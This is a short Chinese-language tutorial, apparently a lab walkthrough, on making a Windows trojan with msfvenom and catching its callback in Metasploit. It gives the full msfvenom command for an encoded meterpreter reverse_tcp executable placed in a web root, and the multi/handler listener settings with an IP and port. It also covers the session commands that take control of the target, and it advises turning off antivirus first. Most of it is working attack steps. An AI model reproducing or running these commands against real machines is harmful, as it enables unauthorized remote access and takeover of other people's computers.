准备工作
用于制作木马文件的kali Linux操作系统以及一台被控靶机(这里我用的是win10虚拟机,没有的同学可以在本地物理机进行操作,注:除了自己安装的杀软需要关闭,Windows安全中心也需要进行关闭)
Kali IP(192.168.......)
靶机 IP(192.168.......)
制作木马
Pyload:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=《kali的IP》 LPORT=《指定任意未被占用的端口号》 -b "\x00" -i 10 -f exe -o /var/www/html/shell.exe(/var/www/html —>指所制作木马文件存储于该路径之下)
注:这里需要kali root用户进行完成,否则可能会报错。
Pyload相关参数含义
将木马拖出放置到桌面
利用msf进行攻击
Msfconsole(启动MSF)
use exploit/multi/handler //开启监听
set payload windows/meterpreter/reverse_tcp //设置payload,选择漏洞利用模块
set lhost 192.168.200.130 //本地IP,即攻击IP
set lport 8088 //监听端口
show options //查看设置参数
进入靶机双击运行木马,然后进行攻击。
exploit //攻击
查看上钩用户
sessions(查看上钩的用户)
sessions -i 1(选择需要攻击的用户,这里选择第 1 个)
当出现meterpreter 时表明我们已经入侵成功
入侵成功之后,我们就可以进行后续攻击行为啦!